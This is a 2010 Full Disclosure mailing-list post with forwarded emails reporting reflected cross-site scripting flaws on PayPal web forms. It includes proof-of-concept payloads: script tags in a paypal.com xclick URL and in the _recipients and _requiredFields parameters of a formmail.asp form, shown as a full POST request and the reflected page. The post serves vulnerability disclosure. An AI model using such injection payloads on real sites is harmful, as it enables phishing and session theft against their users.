Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Paypal Vulnerabilities 7/2010
From: Dunno Dunno <infosecspecialist () yahoo co uk>
Date: Fri, 22 Oct 2010 01:39:56 +0100 (BST)

The discovery of multiple Cross Site Vulnerabilities have been idenitifed on 
Paypal's systems, on Friday, the 2/7/2010. 

Multiple vulnerabilities have been disclosed to Paypal, by Leading Security 
Expert  "Lemonais Nicholas of AISecurity" , following a brief telephone 
conversation with the
Paypal security departments. The Paypal team impressed with their  absolute 
cooperation and professionalism, and their policy for encouraging responsible 
and consensus vulnerability disclosure.


From: "ppelce () paypal co uk" <ppelce () paypal co uk>
To: infosecspecialist () yahoo co uk
Sent: Thu, 15 July, 2010 10:47:27
Subject: PayPal's Office of Executive Escalations (KMM73645347I96L0KM) :ppk4
15 July 2010

Reference number: 218234

Dear Sirs,
Thank you for your recent email dated 07 July to the offices of PayPal. 
Additionally, I would like to apologise for the delay in responding to your
inquiry regarding your PayPal account.
I would like to thank you for taking the time to contact our Site Security 
team regarding your concerns. I can confirm that they are the correct team 
to work with you on any potential vulnerability that you may have found.
PayPal is a strong believer in responsible disclosure of vulnerabilities to
service providers, and has provided a framework for handling disclosure of 
issues.  Please refer to the PayPal Responsible Disclosure Policy 
documented here: 

https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/Re
portingSecurityIssues-outside
You can also be assured the feedback you have provided in your recent 
correspondence has been taken on board and I can assure you that our 
technical and content teams have been made aware of the concerns raised.
At PayPal we value your feedback. It helps us improve our business and 
serve you better, and we thank you for taking the time to contact us. 
Should you have any further queries on this matter, please feel free to 
email us at ppelce () paypal co uk 
Yours sincerely,
Cianan
Executive Escalations
PayPal
Copyright © 1999-2010 PayPal. All rights reserved. PayPal (Europe) S.à r.l.
et Cie, S.C.A. Société en Commandite par Actions. Registered Office: 22-24 
Boulevard Royal, L-2449, Luxembourg, RCS Luxembourg B 118 349

From: Dunno Dunno <infosecspecialist () yahoo co uk>
To: sitesecurity () paypal com
Sent: Tue, 6 July, 2010 23:08:49
Subject: Fw: Paypal Web vulnerability in raw source. _recipients variable does 
not validate input and the _requiredFields.

Dear gentlemen,
 
All usual cross site scripts in theory could be applied to variables.
 
Within the paypal enterprise, please do make sure that any 'variable' in either 
Javascript, or Ruby , or any web language the 'input' is sanitised. Therefore , 
in the main xlick , business variable on paypal.com make sure the search string 
is sanitised.
 
Please read below for more details.
 
 
Any help , please do not to call me for more details :)
 
 
Thanks,
 
N.Y 

----- Forwarded Message ----
From: Dunno Dunno <infosecspecialist () yahoo co uk>
To: sitesecurity () paypal com;
Sent: Tue, 6 July, 2010 23:03:14
Subject: Paypal Web vulnerability in raw source. _recipients variable does not 
validate input and the _requiredFields.

Dear Sirs,
 
Further to our conversation, here are the details of the 'possible' 
vulnerability on your website. Although i have not carried further investigation 
on the bug, just by leading to the website through gooogle search and viewing 
the source legitimately, the accidental bug could be of great importance, as a 
user could masquerade to perform future phishing attacks, by a fooling a 
legitimately logged user from an other paypal site, within the enterprise..
 
1) https://www.paypal.com/xclick/business=<script> alert("xss"); </script>
 
Possible Vulnerability:
 
https://www.paypal-business.co.uk:443/scripts/formmail.asp 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="en" lang="en">
<head>
 <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
 <title>Form Mail</title>
 <style type="text/css">
  body
  {
   background-color: #ffffff;
   color: #000000;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 10pt;
  }
  
  table
  {
   border: solid 1px #000000;
   border-collapse: collapse;
  }
  
  td, th
  {
   border: solid 1px #000000;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 10pt;
   padding: 2px 8px;
  }
  
  th
  {
   background-color: #c0c0c0;
  }
  
  .error
  {
   color: #c00000;
  }
 </style>
</head>
<body>
 <p class="error">
 Form could not be processed due to the following errors:</p>
 <ul>
  <li class="error">No referer.</li>
 
<li class="error">Missing value for 1<script>alert("IS this 
safe?")</script></li> >>> the script does not sanitise input
 </ul>
 <p><a href="#" onclick="history.go(-1); return false;">Back</a></p>
</body> 
</html>

POST https://www.paypal-business.co.uk:443/scripts/formmail.asp HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 
1.1.4322)
Host: www.paypal-business.co.uk
Content-Length: 1517
Cookie: 
ASPSESSIONIDQCQDTCSQ=ALPHGCCCOIAOIKJJOGDLCDBM;ASPSESSIONIDCARASASR=OAMFEECCLCLNKPIHFIHBECEC;s_sess=%20s_cc%3Dtrue%3B

Connection: Close
Pragma: no-cache
_recipients=1<script>alert("IS THIS SAFE AND 
SECURE?")</script>&_subject=Business%20Hub%20Form%3A%20Sign%20up%20for%20Newsgroup&_requiredFields=firstName%2ClastName%2CemailAddress%2CjobTitle&_redirectUrl=https%3A%2F%2Fwww%2Epaypal-business%2Eco%2Euk%2Finformation-for-developers%2Ffrm_thankyou%2Ehtm&firstName=111-222-1933email
 () address tst&lastName=111-222-1933email () address 
tst&DisplayedPayPalAccountHolder=yes&DisplayedHasTransactionalSite=yes&DisplayedProductUsed=Website%20Payments%20Pro&DisplayedCorrectLogo=yes&DisplayedLogoOnHomepage=yes&DisplayedLogoOnProduct=yes&DisplayedLogoOnPayment=yes&DisplayedEstimatedSiteLaunch=less%20than%201%20month&DisplayedEcommerceSolution=yes&DisplayedProvider=123%2Ereg&Company=Paypal&Address1=000-123-4933eml
 () add xxx&Address2=111-222-1933email () address tst&DisplayedCountry=United%20Kingdom&Postcode=111-222-1933email () 
address tst&CompanyTel=111-222-1933email () address tst&Compa
nyURL=111-222-1933email () address 
tst&Email=sample%40email%2Etst&estimatedSiteLaunch=%3C%25%3DestimatedSiteLaunch%20%25%3E&country=%3C%25%3Dcountry%20%25%3E&productUsed=%3C%25%3DproductUsed%20%25%3E&paypalAccountHolder=%3C%25%3DpaypalAccountHolder%20%25%3E&hasTransactionalSite=%3C%25%3DhasTransactionalSite%20%25%3E&ecommerceSolution=%3C%25%3DecommerceSolution%20%25%3E&provider=%3C%25%3Dprovider%20%25%3E&correctLogo=%3C%25%3DcorrectLogo%20%25%3E&logoOnHomePage=%3C%25%3DlogoOnHomePage%20%25%3E&logoOnProductPages=%3C%25%3DlogoOnProductPages%20%25%3E&logoOnPaymentPages=%3C%25%3DlogoOnPaymentPages%20%25%3E
E

Full ViewNew vulnerability discovered.
From: Dunno Dunno <infosecspecialist () yahoo co uk>Add to Contacts 
To: sitesecurity () paypal com  

--------------------------------------------------------------------------------
Dear Sirs,
 
A vulnerability has been realised accidentally whilst casually browsing the 
website and through a search engine redirection of results to paypal bussiness 
UK. The  report has been made on the 02/07/2010
 
The security issue looks like an XSS scripting attack, whereby an attacker could 
execute an .xss script on the user, or either to redirect to a third party 
website, where an xss backdoor or either an xss cookie grabber could be 
installed. The attack could be further encoded to fool legitimate users of 
PayPal through a phishing attack, or either with the execution of illegal 
scripts on legitimate users. The script could also be potentially used for spam 
emailing, or for further access to other PayPal domains, if controlled.
 
the vulnerability occrus on an ASP form on the paypal UK website. 
 
Affected URL:  
https://www.paypal-business.co.uk:443/scripts/formmail.asp/?_recipients=jONOrbeton%40paypal%2Ecom%2C%20ahicks%40paypal%2Ecom&_subject=Business%20Hub%20Form%3A%20Sign%20up%20for%20Newsgroup&_requiredFields=1<script>alert("is
 this 
safe")</script>&_redirectUrl=https%3A%2F%2Fwww%2Epaypal-business%2Eco%2Euk%2Finformation-for-developers%2Ffrm_thankyou%2Ehtm&firstName=333-342-4533info
 () paypal com&lastName=331-123-5674infol () paypal com&emailAddress=331-542-2463infol () paypal com&jobTitle=A%20St

 
Please do also note that  an <img src=.../../paypal.gif> onload, or either a 
redirection to a third party website pointing to an xss script could also be 
possible.
 
 
We did try to get in touch with you, although the IT department anounced a 
remedy for this bug. Please, do also let me know if possible to post this 
message to a vulndev according to your public disclaimer for security.
 
The bug is of a similar nature as , 
http://seclists.org/fulldisclosure/2010/Mar/488 

 
Thanks,
 
Nick.


      
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]